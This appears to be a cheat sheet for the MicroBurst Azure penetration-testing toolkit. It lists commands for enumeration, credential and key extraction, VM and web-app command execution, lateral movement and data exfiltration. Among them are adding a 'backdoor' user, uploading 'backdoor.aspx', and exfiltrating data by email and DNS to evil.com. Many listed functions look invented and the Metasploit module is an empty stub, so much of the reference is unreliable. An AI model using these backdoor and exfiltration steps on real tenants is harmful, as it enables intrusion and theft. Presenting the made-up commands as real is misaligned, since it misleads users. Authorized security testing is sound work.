MicroBurst Azure Security Testing Toolkit Cheat Sheet
Overview
MicroBurst is a collection of PowerShell scripts developed by NetSPI for assessing Microsoft Azure security. It includes tools for Azure service discovery, privilege escalation, lateral movement, and data exfiltration, making it a comprehensive toolkit for Azure penetration testing.
⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.
Installation
PowerShell Gallery Installation
# Install from PowerShell Gallery
Install-Module -Name MicroBurst
# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser
# Update existing installation
Update-Module -Name MicroBurst
# Import module
Import-Module MicroBurst
Manual Installation
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1
# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
Git Installation
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst
# Import in PowerShell
Import-Module .\MicroBurst.psd1
Basic Usage
Module Setup
# Import MicroBurst
Import-Module MicroBurst
# Get available commands
Get-Command -Module MicroBurst
# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full
# Check module version
Get-Module MicroBurst
Authentication
# Interactive authentication
Connect-AzAccount
# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
Command Reference
Reconnaissance Functions
| Function | Description |
|---|---|
Invoke-EnumerateAzureBlobs |
Enumerate Azure storage blobs |
Invoke-EnumerateAzureSubDomains |
Enumerate Azure subdomains |
Get-AzurePasswords |
Extract passwords from Azure resources |
Get-AzureDomainInfo |
Get domain information |
Invoke-AzureRmVmBulkCMD |
Execute commands on multiple VMs |
Storage Account Functions
| Function | Description |
|---|---|
Invoke-EnumerateAzureBlobs |
Find accessible storage blobs |
Get-AzureBlobFiles |
Download files from storage |
Invoke-AzureStorageAccountEnum |
Enumerate storage accounts |
Get-AzureStorageAccountKeys |
Extract storage account keys |
Virtual Machine Functions
| Function | Description |
|---|---|
Invoke-AzureRmVmBulkCMD |
Bulk command execution |
Get-AzureVMDisk |
Access VM disk information |
Invoke-AzureVMUserDataEnum |
Enumerate VM user data |
Get-AzureVMExtensionSettings |
Get VM extension settings |
Azure Storage Enumeration
Blob Storage Discovery
# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"
# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"
# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")
# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10
Storage Account Enumeration
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"
# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"
# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"
# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
File Share Enumeration
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"
# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"
# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
Subdomain and Service Discovery
Azure Subdomain Enumeration
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"
# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")
# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")
# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
Service Discovery
# Discover Azure services
Get-AzureServices -Domain "company.com"
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
DNS Enumeration
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"
# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"
# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
Virtual Machine Exploitation
VM Command Execution
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"
# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"
# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
VM Disk Access
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"
# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"
# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"
# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
VM Extension Exploitation
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"
# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"
# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
Credential and Secret Extraction
Password Extraction
# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"
# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")
# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"
# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
Certificate Extraction
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"
# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"
# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
Configuration Data Extraction
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"
# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"
# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
Database Exploitation
SQL Database Enumeration
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"
# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"
# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
SQL Database Access
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred
# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"
# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"
# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
CosmosDB Exploitation
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"
# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"
# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
Web Application Exploitation
Web App Enumeration
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"
# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"
# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
Web App Exploitation
# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"
# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"
# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"
# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
Function App Exploitation
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"
# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"
# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload
# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
Privilege Escalation
Role Assignment Enumeration
# Get current user roles
Get-AzureCurrentUserRoles
# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"
# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"
# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
Service Principal Abuse
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"
# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"
# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
Managed Identity Exploitation
# Check for managed identity
Test-AzureManagedIdentity
# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"
# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
Lateral Movement
Cross-Subscription Access
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions
# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"
# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
Cross-Tenant Access
# Enumerate accessible tenants
Get-AzureAccessibleTenants
# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"
# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
Resource Group Pivoting
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
Data Exfiltration
Bulk Data Extraction
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
Stealth Exfiltration
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
Automation and Scripting
Automated Assessment Script
# Comprehensive Azure assessment
param(
[string]$SubscriptionId,
[string]$OutputPath = "C:\AzureAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
# Authenticate
Connect-AzAccount
# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains|Out-File "$OutputPath\subdomains.txt"
# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs|Out-File "$OutputPath\blobs.txt"
# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
# Generate summary report
$summary = @\\\\{
AssessmentDate = Get-Date
SubscriptionId = $SubscriptionId
SubdomainsFound = $subdomains.Count
BlobsFound = $blobs.Count
PasswordsFound = $passwords.Count
VMsFound = $vms.Count
\\\\}
$summary|ConvertTo-Json|Out-File "$OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath"
Continuous Monitoring
# Continuous Azure monitoring
param(
[int]$IntervalMinutes = 60,
[string]$LogPath = "C:\AzureMonitoring\monitor.log"
)
while ($true) \\\\{
$timestamp = Get-Date
Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new storage accounts
$newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newStorage) \\\\{
Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new VMs
$newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newVMs) \\\\{
Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new role assignments
$newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newRoles) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\\\}
Troubleshooting
Authentication Issues
# Clear cached credentials
Clear-AzContext -Force
# Test authentication
$context = Get-AzContext
if (-not $context) \\\\{
Write-Error "Not authenticated to Azure"
Connect-AzAccount
\\\\}
# Verify subscription access
Get-AzSubscription
Module Issues
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable
# Update MicroBurst
Update-Module MicroBurst -Force
# Check dependencies
Get-Module Az -ListAvailable
Permission Issues
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments|Select-Object RoleDefinitionName, Scope
# Test specific permissions
try \\\\{
Get-AzStorageAccount -ErrorAction Stop
Write-Output "Storage account read permission: OK"
\\\\}
catch \\\\{
Write-Output "Storage account read permission: DENIED"
\\\\}
Integration with Other Tools
BloodHound Integration
# Export data for BloodHound
$azureData = @\\\\{
users = Get-AzADUser
groups = Get-AzADGroup
servicePrincipals = Get-AzADServicePrincipal
roleAssignments = Get-AzRoleAssignment
\\\\}
# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "azure_bloodhound.json"
Metasploit Integration
# Metasploit module for MicroBurst
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = \\\\{\\\\})
super(update_info(info,
'Name' => 'Azure MicroBurst Integration',
'Description' => 'Execute MicroBurst functions via Metasploit',
'Author' => ['NetSPI'],
'License' => MSF_LICENSE
))
register_options([
OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
])
end
def run
subscription_id = datastore['SUBSCRIPTION_ID']
function = datastore['FUNCTION']
# Execute MicroBurst function
powershell_cmd = "Import-Module MicroBurst; #\\\\{function\\\\} -SubscriptionId #\\\\{subscription_id\\\\}"
print_status("Executing: #\\\\{powershell_cmd\\\\}")
# Execute PowerShell command
end
end
Resources
- MicroBurst GitHub Repository
- NetSPI Blog
- Azure Security Documentation
- Azure Penetration Testing
- Azure Red Team Tactics
This cheat sheet provides a comprehensive reference for using MicroBurst. Always ensure you have proper authorization before conducting Azure security assessments.